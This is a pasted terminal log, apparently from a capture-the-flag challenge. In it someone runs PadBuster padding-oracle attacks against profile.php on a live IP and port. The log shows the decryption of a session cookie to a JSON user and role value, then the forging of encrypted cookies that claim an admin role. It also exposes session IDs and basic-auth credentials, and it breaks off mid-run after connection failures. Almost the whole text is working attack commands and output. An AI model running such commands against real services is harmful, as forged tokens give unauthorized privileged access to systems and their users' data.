API tools faq
paste
Guest User

Untitled

a guest
May 13th, 2018
47
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 27.70 KB | None | 0 0
raw download clone embed print report
  1. *** Starting Block 1 of 6 ***
  2.  
  3. ERROR: Encrypted sample was not found in the test request
  4. root@kali:~/Downloads# padbuster http://88.198.233.174:48066/profile.php v4DZcOHb+HgaQSFl9GElvWzNK3K+VtGfdamHMO0KWQ8IrK941jspX7yFnPnLuZhSP966GeTVm3w 8 -cookies PHPSESSID=9hgnilvv92o6g4dfg5thjq1gh0 -auth cipherttt:ankit123
  5.  
  6. +-------------------------------------------+
  7. | PadBuster - v0.3.3 |
  8. | Brian Holyfield - Gotham Digital Science |
  9. | labs@gdssecurity.com |
  10. +-------------------------------------------+
  11.  
  12. INFO: The original request returned the following
  13. [+] Status: 200
  14. [+] Location: N/A
  15. [+] Content Length: 3863
  16.  
  17. INFO: Starting PadBuster Decrypt Mode
  18. *** Starting Block 1 of 6 ***
  19.  
  20. ERROR: Encrypted sample was not found in the test request
  21. root@kali:~/Downloads# clear
  22.  
  23. root@kali:~/Downloads# padbuster http://88.198.233.174:48066/profile.php v4DZcOHb%2BHgaQSFl9GElvWzNK3K%2BVtGfdamHMO0KWQ8IrK941jspX7yFnPnLuZhSP966GeTVm3w%3D 8 -cookies PHPSESSID=9hgnilvv92o6g4dfg5thjq1gh0; iknowmag1k=v4DZcOHb%2BHgaQSFl9GElvWzNK3K%2BVtGfdamHMO0KWQ8IrK941jspX7yFnPnLuZhSP966GeTVm3w%3D
  24.  
  25. +-------------------------------------------+
  26. | PadBuster - v0.3.3 |
  27. | Brian Holyfield - Gotham Digital Science |
  28. | labs@gdssecurity.com |
  29. +-------------------------------------------+
  30.  
  31. INFO: The original request returned the following
  32. [+] Status: 200
  33. [+] Location: N/A
  34. [+] Content Length: 3853
  35.  
  36. INFO: Starting PadBuster Decrypt Mode
  37. *** Starting Block 1 of 6 ***
  38.  
  39. ERROR: Encrypted sample was not found in the test request
  40. root@kali:~/Downloads# padbuster http://88.198.233.174:48066/profile.php v4DZcOHb%2BHgaQSFl9GElvWzNK3K%2BVtGfdamHMO0KWQ8IrK941jspX7yFnPnLuZhSP966GeTVm3w%3D 8 -cookies PHPSESSID=9hgnilvv92o6g4dfg5thjq1gh0; iknowmag1k=v4DZcOHb%2BHgaQSFl9GElvWzNK3K%2BVtGfdamHMO0KWQ8IrK941jspX7yFnPnLuZhSP966GeTVm3w%3D -auth rohan:rohan@123
  41.  
  42. +-------------------------------------------+
  43. | PadBuster - v0.3.3 |
  44. | Brian Holyfield - Gotham Digital Science |
  45. | labs@gdssecurity.com |
  46. +-------------------------------------------+
  47.  
  48. INFO: The original request returned the following
  49. [+] Status: 200
  50. [+] Location: N/A
  51. [+] Content Length: 3853
  52.  
  53. INFO: Starting PadBuster Decrypt Mode
  54. *** Starting Block 1 of 6 ***
  55.  
  56. ERROR: Encrypted sample was not found in the test request
  57. bash: -auth: command not found
  58. root@kali:~/Downloads# padbuster http://88.198.233.174:48066/profile.php v4DZcOHb%2BHgaQSFl9GElvWzNK3K%2BVtGfdamHMO0KWQ8IrK941jspX7yFnPnLuZhSP966GeTVm3w%3D 8 -cookies PHPSESSID=9hgnilvv92o6g4dfg5thjq1gh0; iknowmag1k=v4DZcOHb%2BHgaQSFl9GElvWzNK3K%2BVtGfdamHMO0KWQ8IrK941jspX7yFnPnLuZhSP966GeTVm3w%3D -auth rohan:rohan@123
  59.  
  60. +-------------------------------------------+
  61. | PadBuster - v0.3.3 |
  62. | Brian Holyfield - Gotham Digital Science |
  63. | labs@gdssecurity.com |
  64. +-------------------------------------------+
  65.  
  66. INFO: The original request returned the following
  67. [+] Status: 200
  68. [+] Location: N/A
  69. [+] Content Length: 3853
  70.  
  71. INFO: Starting PadBuster Decrypt Mode
  72. *** Starting Block 1 of 6 ***
  73.  
  74. ERROR: Encrypted sample was not found in the test request
  75. bash: -auth: command not found
  76. root@kali:~/Downloads# padbuster
  77.  
  78. +-------------------------------------------+
  79. | PadBuster - v0.3.3 |
  80. | Brian Holyfield - Gotham Digital Science |
  81. | labs@gdssecurity.com |
  82. +-------------------------------------------+
  83.  
  84. Use: padbuster URL EncryptedSample BlockSize [options]
  85.  
  86. Where: URL = The target URL (and query string if applicable)
  87. EncryptedSample = The encrypted value you want to test. Must
  88. also be present in the URL, PostData or a Cookie
  89. BlockSize = The block size being used by the algorithm
  90.  
  91. Options:
  92. -auth [username:password]: HTTP Basic Authentication
  93. -bruteforce: Perform brute force against the first block
  94. -ciphertext [Bytes]: CipherText for Intermediate Bytes (Hex-Encoded)
  95. -cookies [HTTP Cookies]: Cookies (name1=value1; name2=value2)
  96. -encoding [0-4]: Encoding Format of Sample (Default 0)
  97. 0=Base64, 1=Lower HEX, 2=Upper HEX
  98. 3=.NET UrlToken, 4=WebSafe Base64
  99. -encodedtext [Encoded String]: Data to Encrypt (Encoded)
  100. -error [Error String]: Padding Error Message
  101. -headers [HTTP Headers]: Custom Headers (name1::value1;name2::value2)
  102. -interactive: Prompt for confirmation on decrypted bytes
  103. -intermediate [Bytes]: Intermediate Bytes for CipherText (Hex-Encoded)
  104. -log: Generate log files (creates folder PadBuster.DDMMYY)
  105. -noencode: Do not URL-encode the payload (encoded by default)
  106. -noiv: Sample does not include IV (decrypt first block)
  107. -plaintext [String]: Plain-Text to Encrypt
  108. -post [Post Data]: HTTP Post Data String
  109. -prefix [Prefix]: Prefix bytes to append to each sample (Encoded)
  110. -proxy [address:port]: Use HTTP/S Proxy
  111. -proxyauth [username:password]: Proxy Authentication
  112. -resume [Block Number]: Resume at this block number
  113. -usebody: Use response body content for response analysis phase
  114. -verbose: Be Verbose
  115. -veryverbose: Be Very Verbose (Debug Only)
  116.  
  117. root@kali:~/Downloads# padbuster http://88.198.233.174:48066/profile.php v4DZcOHb%2BHgaQSFl9GElvWzNK3K%2BVtGfdamHMO0KWQ8IrK941jspX7yFnPnLuZhSP966GeTVm3w%3D 8 -cookies PHPSESSID=9hgnilvv92o6g4dfg5thjq1gh0; iknowmag1k=v4DZcOHb%2BHgaQSFl9GElvWzNK3K%2BVtGfdamHMO0KWQ8IrK941jspX7yFnPnLuZhSP966GeTVm3w%3D --auth rohan:rohan@123
  118.  
  119. +-------------------------------------------+
  120. | PadBuster - v0.3.3 |
  121. | Brian Holyfield - Gotham Digital Science |
  122. | labs@gdssecurity.com |
  123. +-------------------------------------------+
  124.  
  125. INFO: The original request returned the following
  126. [+] Status: 200
  127. [+] Location: N/A
  128. [+] Content Length: 3853
  129.  
  130. INFO: Starting PadBuster Decrypt Mode
  131. *** Starting Block 1 of 6 ***
  132.  
  133. ERROR: Encrypted sample was not found in the test request
  134. bash: --auth: command not found
  135. root@kali:~/Downloads# padbuster http://88.198.233.174:48066/profile.php v4DZcOHb%2BHgaQSFl9GElvWzNK3K%2BVtGfdamHMO0KWQ8IrK941jspX7yFnPnLuZhSP966GeTVm3w%3D 8 -cookies PHPSESSID=9hgnilvv92o6g4dfg5thjq1gh0; iknowmag1k=v4DZcOHb%2BHgaQSFl9GElvWzNK3K%2BVtGfdamHMO0KWQ8IrK941jspX7yFnPnLuZhSP966GeTVm3w%3D
  136.  
  137. +-------------------------------------------+
  138. | PadBuster - v0.3.3 |
  139. | Brian Holyfield - Gotham Digital Science |
  140. | labs@gdssecurity.com |
  141. +-------------------------------------------+
  142.  
  143. INFO: The original request returned the following
  144. [+] Status: 200
  145. [+] Location: N/A
  146. [+] Content Length: 3853
  147.  
  148. INFO: Starting PadBuster Decrypt Mode
  149. *** Starting Block 1 of 6 ***
  150.  
  151. ERROR: Encrypted sample was not found in the test request
  152. root@kali:~/Downloads# padbuster http://88.198.233.174:48066/profile.php v4DZcOHb%2BHgaQSFl9GElvWzNK3K%2BVtGfdamHMO0KWQ8IrK941jspX7yFnPnLuZhSP966GeTVm3w%3D 8 -cookies iknowmag1k=v4DZcOHb%2BHgaQSFl9GElvWzNK3K%2BVtGfdamHMO0KWQ8IrK941jspX7yFnPnLuZhSP966GeTVm3w%3D
  153.  
  154. +-------------------------------------------+
  155. | PadBuster - v0.3.3 |
  156. | Brian Holyfield - Gotham Digital Science |
  157. | labs@gdssecurity.com |
  158. +-------------------------------------------+
  159.  
  160. INFO: The original request returned the following
  161. [+] Status: 302
  162. [+] Location: login.php
  163. [+] Content Length: 0
  164.  
  165. INFO: Starting PadBuster Decrypt Mode
  166. *** Starting Block 1 of 6 ***
  167.  
  168. INFO: No error string was provided...starting response analysis
  169.  
  170. *** Response Analysis Complete ***
  171.  
  172. The following response signatures were returned:
  173.  
  174. -------------------------------------------------------
  175. ID# Freq Status Length Location
  176. -------------------------------------------------------
  177. 1 1 302 0 login.php
  178. 2 ** 255 500 0 N/A
  179. -------------------------------------------------------
  180.  
  181. Enter an ID that matches the error condition
  182. NOTE: The ID# marked with ** is recommended :
  183. Use of uninitialized value $input in pattern match (m//) at /usr/bin/padbuster line 848, <STDIN> line 1.
  184.  
  185. Enter an ID that matches the error condition
  186. NOTE: The ID# marked with ** is recommended : 2
  187.  
  188. Continuing test with selection 2
  189.  
  190. [+] Success: (189/256) [Byte 8]
  191. [+] Success: (40/256) [Byte 7]
  192. [+] Success: (86/256) [Byte 6]
  193. [+] Success: (128/256) [Byte 5]
  194. [+] Success: (250/256) [Byte 4]
  195. [+] Success: (86/256) [Byte 3]
  196. [+] Success: (91/256) [Byte 2]
  197. [+] Success: (52/256) [Byte 1]
  198.  
  199. Block 1 Results:
  200. [+] Cipher Text (HEX): 1a412165f46125bd
  201. [+] Intermediate Bytes (HEX): c4a2ac0384a9da42
  202. [+] Plain Text: {"user":
  203.  
  204. Use of uninitialized value $plainTextBytes in concatenation (.) or string at /usr/bin/padbuster line 361, <STDIN> line 2.
  205. *** Starting Block 2 of 6 ***
  206.  
  207. [+] Success: (56/256) [Byte 8]
  208. [+] Success: (171/256) [Byte 7]
  209. [+] Success: (249/256) [Byte 6]
  210. [+] Success: (104/256) [Byte 5]
  211. [+] Success: (240/256) [Byte 4]
  212. [+] Success: (178/256) [Byte 3]
  213. [+] Success: (219/256) [Byte 2]
  214. [+] Success: (208/256) [Byte 1]
  215.  
  216. Block 2 Results:
  217. [+] Cipher Text (HEX): 6ccd2b72be56d19f
  218. [+] Intermediate Bytes (HEX): 382248159c0457c9
  219. [+] Plain Text: "ciphert
  220.  
  221. *** Starting Block 3 of 6 ***
  222.  
  223. [+] Success: (14/256) [Byte 8]
  224. [+] Success: (68/256) [Byte 7]
  225. [+] Success: (217/256) [Byte 6]
  226. [+] Success: (104/256) [Byte 5]
  227. [+] Success: (165/256) [Byte 4]
  228. [+] Success: (241/256) [Byte 3]
  229. [+] Success: (66/256) [Byte 2]
  230. [+] Success: (240/256) [Byte 1]
  231.  
  232. Block 3 Results:
  233. [+] Cipher Text (HEX): 75a98730ed0a590f
  234. [+] Intermediate Bytes (HEX): 18b9095e9c24bef3
  235. [+] Plain Text: tt","rol
  236.  
  237. *** Starting Block 4 of 6 ***
  238.  
  239. [+] Success: (132/256) [Byte 8]
  240. [+] Success: (194/256) [Byte 7]
  241. [+] Success: (134/256) [Byte 6]
  242. [+] Success: (100/256) [Byte 5]
  243. [+] Success: (233/256) [Byte 4]
  244. [+] Success: (69/256) [Byte 3]
  245. [+] Success: (116/256) [Byte 2]
  246. [+] Success: (232/256) [Byte 1]
  247.  
  248. Block 4 Results:
  249. [+] Cipher Text (HEX): 08acaf78d63b295f
  250. [+] Intermediate Bytes (HEX): 108bbd1298793c7d
  251. [+] Plain Text: e":"user
  252.  
  253. *** Starting Block 5 of 6 ***
  254.  
  255. [+] Success: (176/256) [Byte 8]
  256. [+] Success: (219/256) [Byte 7]
  257. [+] Success: (202/256) [Byte 6]
  258. [+] Success: (36/256) [Byte 5]
  259. [+] Success: (141/256) [Byte 4]
  260. [+] Success: (89/256) [Byte 3]
  261. [+] Success: (42/256) [Byte 2]
  262. [+] Success: (222/256) [Byte 1]
  263.  
  264. Block 5 Results:
  265. [+] Cipher Text (HEX): bc859cf9cbb99852
  266. [+] Intermediate Bytes (HEX): 2ad1a176d8352751
  267. [+] Plain Text: "}
  268.  
  269. *** Starting Block 6 of 6 ***
  270.  
  271. [+] Success: (163/256) [Byte 8]
  272. [+] Success: (108/256) [Byte 7]
  273. [+] Success: (76/256) [Byte 6]
  274. [+] Success: (63/256) [Byte 5]
  275. [+] Success: (14/256) [Byte 4]
  276. [+] Success: (108/256) [Byte 3]
  277. [+] Success: (116/256) [Byte 2]
  278. [+] Success: (70/256) [Byte 1]
  279.  
  280. Block 6 Results:
  281. [+] Cipher Text (HEX): 3fdeba19e4d59b7c
  282. [+] Intermediate Bytes (HEX): b28b92f7c5b7965c
  283. [+] Plain Text:
  284.  
  285. -------------------------------------------------------
  286. ** Finished ***
  287.  
  288. [+] Decrypted value (ASCII): {"user":"cipherttt","role":"user"}
  289.  
  290. [+] Decrypted value (HEX): 7B2275736572223A22636970686572747474222C22726F6C65223A2275736572227D0E0E0E0E0E0E0E0E0E0E0E0E0E0E
  291.  
  292. [+] Decrypted value (Base64): eyJ1c2VyIjoiY2lwaGVydHR0Iiwicm9sZSI6InVzZXIifQ4ODg4ODg4ODg4ODg4O
  293.  
  294. -------------------------------------------------------
  295.  
  296. root@kali:~/Downloads# padbuster
  297.  
  298. +-------------------------------------------+
  299. | PadBuster - v0.3.3 |
  300. | Brian Holyfield - Gotham Digital Science |
  301. | labs@gdssecurity.com |
  302. +-------------------------------------------+
  303.  
  304. Use: padbuster URL EncryptedSample BlockSize [options]
  305.  
  306. Where: URL = The target URL (and query string if applicable)
  307. EncryptedSample = The encrypted value you want to test. Must
  308. also be present in the URL, PostData or a Cookie
  309. BlockSize = The block size being used by the algorithm
  310.  
  311. Options:
  312. -auth [username:password]: HTTP Basic Authentication
  313. -bruteforce: Perform brute force against the first block
  314. -ciphertext [Bytes]: CipherText for Intermediate Bytes (Hex-Encoded)
  315. -cookies [HTTP Cookies]: Cookies (name1=value1; name2=value2)
  316. -encoding [0-4]: Encoding Format of Sample (Default 0)
  317. 0=Base64, 1=Lower HEX, 2=Upper HEX
  318. 3=.NET UrlToken, 4=WebSafe Base64
  319. -encodedtext [Encoded String]: Data to Encrypt (Encoded)
  320. -error [Error String]: Padding Error Message
  321. -headers [HTTP Headers]: Custom Headers (name1::value1;name2::value2)
  322. -interactive: Prompt for confirmation on decrypted bytes
  323. -intermediate [Bytes]: Intermediate Bytes for CipherText (Hex-Encoded)
  324. -log: Generate log files (creates folder PadBuster.DDMMYY)
  325. -noencode: Do not URL-encode the payload (encoded by default)
  326. -noiv: Sample does not include IV (decrypt first block)
  327. -plaintext [String]: Plain-Text to Encrypt
  328. -post [Post Data]: HTTP Post Data String
  329. -prefix [Prefix]: Prefix bytes to append to each sample (Encoded)
  330. -proxy [address:port]: Use HTTP/S Proxy
  331. -proxyauth [username:password]: Proxy Authentication
  332. -resume [Block Number]: Resume at this block number
  333. -usebody: Use response body content for response analysis phase
  334. -verbose: Be Verbose
  335. -veryverbose: Be Very Verbose (Debug Only)
  336.  
  337. root@kali:~/Downloads# padbuster http://88.198.233.174:48066/profile.php v4DZcOHb%2BHgaQSFl9GElvWzNK3K%2BVtGfdamHMO0KWQ8IrK941jspX7yFnPnLuZhSP966GeTVm3w%3D 8 -cookies iknowmag1k=v4DZcOHb%2BHgaQSFl9GElvWzNK3K%2BVtGfdamHMO0KWQ8IrK941jspX7yFnPnLuZhSP966GeTVm3w%3D -encodedtext admin:admin
  338.  
  339. +-------------------------------------------+
  340. | PadBuster - v0.3.3 |
  341. | Brian Holyfield - Gotham Digital Science |
  342. | labs@gdssecurity.com |
  343. +-------------------------------------------+
  344.  
  345. INFO: The original request returned the following
  346. [+] Status: 302
  347. [+] Location: login.php
  348. [+] Content Length: 0
  349.  
  350. INFO: Starting PadBuster Encrypt Mode
  351. [+] Number of Blocks: 1
  352.  
  353. INFO: No error string was provided...starting response analysis
  354.  
  355. ^C
  356. root@kali:~/Downloads# padbuster http://88.198.233.174:48066/profile.php v4DZcOHb%2BHgaQSFl9GElvWzNK3K%2BVtGfdamHMO0KWQ8IrK941jspX7yFnPnLuZhSP966GeTVm3w%3D 8 -cookies iknowmag1k=v4DZcOHb%2BHgaQSFl9GElvWzNK3K%2BVtGfdamHMO0KWQ8IrK941jspX7yFnPnLuZhSP966GeTVm3w%3D -encodedtext {"user":"admin","role":"admin"}
  357.  
  358. +-------------------------------------------+
  359. | PadBuster - v0.3.3 |
  360. | Brian Holyfield - Gotham Digital Science |
  361. | labs@gdssecurity.com |
  362. +-------------------------------------------+
  363.  
  364. INFO: The original request returned the following
  365. [+] Status: 302
  366. [+] Location: login.php
  367. [+] Content Length: 0
  368.  
  369. INFO: Starting PadBuster Encrypt Mode
  370. [+] Number of Blocks: 1
  371.  
  372. INFO: No error string was provided...starting response analysis
  373.  
  374. *** Response Analysis Complete ***
  375.  
  376. The following response signatures were returned:
  377.  
  378. -------------------------------------------------------
  379. ID# Freq Status Length Location
  380. -------------------------------------------------------
  381. 1 1 302 0 login.php
  382. 2 ** 255 500 0 N/A
  383. -------------------------------------------------------
  384.  
  385. Enter an ID that matches the error condition
  386. NOTE: The ID# marked with ** is recommended : 2
  387.  
  388. Continuing test with selection 2
  389.  
  390. [+] Success: (97/256) [Byte 8]
  391. [+] Success: (155/256) [Byte 7]
  392. [+] Success: (87/256) [Byte 6]
  393. [+] Success: (153/256) [Byte 5]
  394. [+] Success: (61/256) [Byte 4]
  395. [+] Success: (188/256) [Byte 3]
  396. [+] Success: (151/256) [Byte 2]
  397. [+] Success: (167/256) [Byte 1]
  398.  
  399. Block 1 Results:
  400. [+] New Cipher Text (HEX): eba9e9afba08659c
  401. [+] Intermediate Bytes (HEX): 516e42c663aa679e
  402.  
  403. -------------------------------------------------------
  404. ** Finished ***
  405.  
  406. [+] Encrypted value is: 66npr7oIZZwAAAAAAAAAAA%3D%3D
  407. -------------------------------------------------------
  408.  
  409. root@kali:~/Downloads# padbuster http://88.198.233.174:48066/profile.php v4DZcOHb%2BHgaQSFl9GElvWzNK3K%2BVtGfdamHMO0KWQ8IrK941jspX7yFnPnLuZhSP966GeTVm3w%3D 8 -cookies iknowmag1k=v4DZcOHb%2BHgaQSFl9GElvWzNK3K%2BVtGfdamHMO0KWQ8IrK941jspX7yFnPnLuZhSP966GeTVm3w%3D -encoding 0 -plaintext {"user":"admin","role":"admin"}
  410.  
  411. +-------------------------------------------+
  412. | PadBuster - v0.3.3 |
  413. | Brian Holyfield - Gotham Digital Science |
  414. | labs@gdssecurity.com |
  415. +-------------------------------------------+
  416.  
  417. INFO: The original request returned the following
  418. [+] Status: 302
  419. [+] Location: login.php
  420. [+] Content Length: 0
  421.  
  422. INFO: Starting PadBuster Encrypt Mode
  423. [+] Number of Blocks: 2
  424.  
  425. INFO: No error string was provided...starting response analysis
  426.  
  427. *** Response Analysis Complete ***
  428.  
  429. The following response signatures were returned:
  430.  
  431. -------------------------------------------------------
  432. ID# Freq Status Length Location
  433. -------------------------------------------------------
  434. 1 1 302 0 login.php
  435. 2 ** 255 500 0 N/A
  436. -------------------------------------------------------
  437.  
  438. Enter an ID that matches the error condition
  439. NOTE: The ID# marked with ** is recommended : 2
  440.  
  441. Continuing test with selection 2
  442.  
  443. [+] Success: (97/256) [Byte 8]
  444. [+] Success: (155/256) [Byte 7]
  445. [+] Success: (87/256) [Byte 6]
  446. [+] Success: (153/256) [Byte 5]
  447. [+] Success: (61/256) [Byte 4]
  448. [+] Success: (188/256) [Byte 3]
  449. [+] Success: (151/256) [Byte 2]
  450. [+] Success: (167/256) [Byte 1]
  451.  
  452. Block 2 Results:
  453. [+] New Cipher Text (HEX): 380044c065ac6198
  454. [+] Intermediate Bytes (HEX): 516e42c663aa679e
  455.  
  456. [+] Success: (109/256) [Byte 8]
  457. [+] Success: (190/256) [Byte 7]
  458. [+] Success: (13/256) [Byte 6]
  459. [+] Success: (129/256) [Byte 5]
  460. [+] Success: (249/256) [Byte 4]
  461. [+] Success: (71/256) [Byte 3]
  462. [+] Success: (96/256) [Byte 2]
  463. [+] Success: (233/256) [Byte 1]
  464.  
  465. Block 1 Results:
  466. [+] New Cipher Text (HEX): 6ad4da70419124ff
  467. [+] Intermediate Bytes (HEX): 1fa7bf027bf04092
  468.  
  469. -------------------------------------------------------
  470. ** Finished ***
  471.  
  472. [+] Encrypted value is: atTacEGRJP84AETAZaxhmAAAAAAAAAAA
  473. -------------------------------------------------------
  474.  
  475. root@kali:~/Downloads# ^C
  476. root@kali:~/Downloads# ^C
  477. root@kali:~/Downloads# padbuster http://88.198.233.174:48066/profile.php v4DZcOHb%2BHgaQSFl9GElvWzNK3K%2BVtGfdamHMO0KWQ8IrK941jspX7yFnPnLuZhSP966GeTVm3w%3D 8 -cookies iknowmag1k=v4DZcOHb%2BHgaQSFl9GElvWzNK3K%2BVtGfdamHMO0KWQ8IrK941jspX7yFnPnLuZhSP966GeTVm3w%3D -encoding 0 -plaintext {"user":"admin","role":"admin"}
  478.  
  479. +-------------------------------------------+
  480. | PadBuster - v0.3.3 |
  481. | Brian Holyfield - Gotham Digital Science |
  482. | labs@gdssecurity.com |
  483. +-------------------------------------------+
  484.  
  485. INFO: The original request returned the following
  486. [+] Status: 302
  487. [+] Location: login.php
  488. [+] Content Length: 0
  489.  
  490. INFO: Starting PadBuster Encrypt Mode
  491. [+] Number of Blocks: 2
  492.  
  493. INFO: No error string was provided...starting response analysis
  494.  
  495. *** Response Analysis Complete ***
  496.  
  497. The following response signatures were returned:
  498.  
  499. -------------------------------------------------------
  500. ID# Freq Status Length Location
  501. -------------------------------------------------------
  502. 1 1 302 0 login.php
  503. 2 ** 255 500 0 N/A
  504. -------------------------------------------------------
  505.  
  506. Enter an ID that matches the error condition
  507. NOTE: The ID# marked with ** is recommended : 1
  508.  
  509. Continuing test with selection 1
  510.  
  511. [+] Success: (1/256) [Byte 8]
  512. [+] Success: (1/256) [Byte 7]
  513. [+] Success: (1/256) [Byte 6]
  514. [+] Success: (1/256) [Byte 5]
  515. [+] Success: (1/256) [Byte 4]
  516. [+] Success: (1/256) [Byte 3]
  517. [+] Success: (1/256) [Byte 2]
  518. [+] Success: (1/256) [Byte 1]
  519.  
  520. Block 2 Results:
  521. [+] New Cipher Text (HEX): 9e96fffcfdfafbf8
  522. [+] Intermediate Bytes (HEX): f7f8f9fafbfcfdfe
  523.  
  524. [+] Success: (1/256) [Byte 8]
  525. [+] Success: (1/256) [Byte 7]
  526. [+] Success: (1/256) [Byte 6]
  527. [+] Success: (1/256) [Byte 5]
  528. [+] Success: (1/256) [Byte 4]
  529. [+] Success: (1/256) [Byte 3]
  530. [+] Success: (1/256) [Byte 2]
  531. [+] Success: (1/256) [Byte 1]
  532.  
  533. Block 1 Results:
  534. [+] New Cipher Text (HEX): 828b9c88c19d9993
  535. [+] Intermediate Bytes (HEX): f7f8f9fafbfcfdfe
  536.  
  537. -------------------------------------------------------
  538. ** Finished ***
  539.  
  540. [+] Encrypted value is: gouciMGdmZOelv%2F8%2Ffr7%2BAAAAAAAAAAA
  541. -------------------------------------------------------
  542.  
  543. root@kali:~/Downloads# ^C
  544. root@kali:~/Downloads# ^C
  545. root@kali:~/Downloads# padbuster http://88.198.233.174:48066/profile.php v4DZcOHb%2BHgaQSFl9GElvWzNK3K%2BVtGfdamHMO0KWQ8IrK941jspX7yFnPnLuZhSP966GeTVm3w%3D 8 -cookies iknowmag1k=v4DZcOHb%2BHgaQSFl9GElvWzNK3K%2BVtGfdamHMO0KWQ8IrK941jspX7yFnPnLuZhSP966GeTVm3w%3D -encoding 0 -plaintext {"user":"rohan","role":"admin"}
  546.  
  547. +-------------------------------------------+
  548. | PadBuster - v0.3.3 |
  549. | Brian Holyfield - Gotham Digital Science |
  550. | labs@gdssecurity.com |
  551. +-------------------------------------------+
  552.  
  553. INFO: The original request returned the following
  554. [+] Status: 302
  555. [+] Location: login.php
  556. [+] Content Length: 0
  557.  
  558. INFO: Starting PadBuster Encrypt Mode
  559. [+] Number of Blocks: 2
  560.  
  561. INFO: No error string was provided...starting response analysis
  562.  
  563. *** Response Analysis Complete ***
  564.  
  565. The following response signatures were returned:
  566.  
  567. -------------------------------------------------------
  568. ID# Freq Status Length Location
  569. -------------------------------------------------------
  570. 1 1 302 0 login.php
  571. 2 ** 255 500 0 N/A
  572. -------------------------------------------------------
  573.  
  574. Enter an ID that matches the error condition
  575. NOTE: The ID# marked with ** is recommended : 2
  576.  
  577. Continuing test with selection 2
  578.  
  579. [+] Success: (97/256) [Byte 8]
  580. [+] Success: (155/256) [Byte 7]
  581. [+] Success: (87/256) [Byte 6]
  582. [+] Success: (153/256) [Byte 5]
  583. [+] Success: (61/256) [Byte 4]
  584. [+] Success: (188/256) [Byte 3]
  585. [+] Success: (151/256) [Byte 2]
  586. [+] Success: (167/256) [Byte 1]
  587.  
  588. Block 2 Results:
  589. [+] New Cipher Text (HEX): 300044c065ac6198
  590. [+] Intermediate Bytes (HEX): 516e42c663aa679e
  591.  
  592. [+] Success: (85/256) [Byte 8]
  593. [+] Success: (67/256) [Byte 7]
  594. [+] Success: (146/256) [Byte 6]
  595. [+] Success: (91/256) [Byte 5]
  596. [+] Success: (5/256) [Byte 4]
  597. [+] Success: (243/256) [Byte 3]
  598. [+] Success: (88/256) [Byte 2]
  599. [+] Success: (108/256) [Byte 1]
  600.  
  601. Block 1 Results:
  602. [+] New Cipher Text (HEX): e9dc6e8c9b1fd0c2
  603. [+] Intermediate Bytes (HEX): 9caf0bfea16dbfaa
  604.  
  605. -------------------------------------------------------
  606. ** Finished ***
  607.  
  608. [+] Encrypted value is: 6dxujJsf0MIwAETAZaxhmAAAAAAAAAAA
  609. -------------------------------------------------------
  610.  
  611. root@kali:~/Downloads# padbuster http://88.198.233.174:48066/profile.php v4DZcOHb%2BHgaQSFl9GElvWzNK3K%2BVtGfdamHMO0KWQ8IrK941jspX7yFnPnLuZhSP966GeTVm3w%3D 8 -cookies iknowmag1k=v4DZcOHb%2BHgaQSFl9GElvWzNK3K%2BVtGfdamHMO0KWQ8IrK941jspX7yFnPnLuZhSP966GeTVm3w%3D -encoding 0 -plaintext {"user":"rohanpan","role":"admin"}
  612.  
  613. +-------------------------------------------+
  614. | PadBuster - v0.3.3 |
  615. | Brian Holyfield - Gotham Digital Science |
  616. | labs@gdssecurity.com |
  617. +-------------------------------------------+
  618.  
  619. INFO: The original request returned the following
  620. [+] Status: 302
  621. [+] Location: login.php
  622. [+] Content Length: 0
  623.  
  624. INFO: Starting PadBuster Encrypt Mode
  625. [+] Number of Blocks: 2
  626.  
  627. INFO: No error string was provided...starting response analysis
  628.  
  629. *** Response Analysis Complete ***
  630.  
  631. The following response signatures were returned:
  632.  
  633. -------------------------------------------------------
  634. ID# Freq Status Length Location
  635. -------------------------------------------------------
  636. 1 1 302 0 login.php
  637. 2 ** 255 500 0 N/A
  638. -------------------------------------------------------
  639.  
  640. Enter an ID that matches the error condition
  641. NOTE: The ID# marked with ** is recommended : 2
  642.  
  643. Continuing test with selection 2
  644.  
  645. [+] Success: (97/256) [Byte 8]
  646. [+] Success: (155/256) [Byte 7]
  647. [+] Success: (6/256) [Byte 6]
  648. ERROR: 500 Can't connect to 88.198.233.174:48066
  649. Retrying in 10 seconds...
  650.  
  651. ERROR: 500 Can't connect to 88.198.233.174:48066
  652. Retrying in 10 seconds...
  653.  
  654. ERROR: 500 Can't connect to 88.198.233.174:48066
  655. Retrying in 10 seconds...
  656.  
  657. ERROR: 500 Can't connect to 88.198.233.174:48066
  658. Retrying in 10 seconds...
  659.  
  660. ERROR: 500 Can't connect to 88.198.233.174:48066
  661. Retrying in 10 seconds...
  662.  
  663. ERROR: 500 Can't connect to 88.198.233.174:48066
  664. Retrying in 10 seconds...
  665.  
  666. ERROR: 500 Can't connect to 88.198.233.174:48066
  667. Retrying in 10 seconds...
  668.  
  669. ERROR: 500 Can't connect to 88.198.233.174:48066
  670. Retrying in 10 seconds...
  671.  
  672. ERROR: 500 Can't connect to 88.198.233.174:48066
  673. Retrying in 10 seconds...
  674.  
  675. ERROR: 500 Can't connect to 88.198.233.174:48066
  676. Retrying in 10 seconds...
  677.  
  678. ERROR: 500 Can't connect to 88.198.233.174:48066
  679. Retrying in 10 seconds...
  680.  
  681. ERROR: 500 Can't connect to 88.198.233.174:48066
  682. Retrying in 10 seconds...
  683.  
  684. ERROR: 500 Can't connect to 88.198.233.174:48066
  685. Retrying in 10 seconds...
  686.  
  687. ERROR: 500 Can't connect to 88.198.233.174:48066
  688. Retrying in 10 seconds...
  689.  
  690. ERROR: 500 Can't connect to 88.198.233.174:48066
  691. Retrying in 10 seconds...
  692.  
  693. ERROR: Number of retries has exceeded 15 attempts...quitting.
  694.  
  695. root@kali:~/Downloads# padbuster http://88.198.233.174:48126/profile.php v4DZcOHb%2BHgaQSFl9GElvWzNK3K%2BVtGfdamHMO0KWQ8IrK941jspX7yFnPnLuZhSP966GeTVm3w%3D 8 -cookies iknowmag1k=v4DZcOHb%2BHgaQSFl9GElvWzNK3K%2BVtGfdamHMO0KWQ8IrK941jspX7yFnPnLuZhSP966GeTVm3w%3D -encoding 0 -plaintext {"user":"rohanpan","role":"admin"}
  696.  
  697. +-------------------------------------------+
  698. | PadBuster - v0.3.3 |
  699. | Brian Holyfield - Gotham Digital Science |
  700. | labs@gdssecurity.com |
  701. +-------------------------------------------+
  702.  
  703. INFO: The original request returned the following
  704. [+] Status: 302
  705. [+] Location: login.php
  706. [+] Content Length: 0
  707.  
  708. INFO: Starting PadBuster Encrypt Mode
  709. [+] Number of Blocks: 2
  710.  
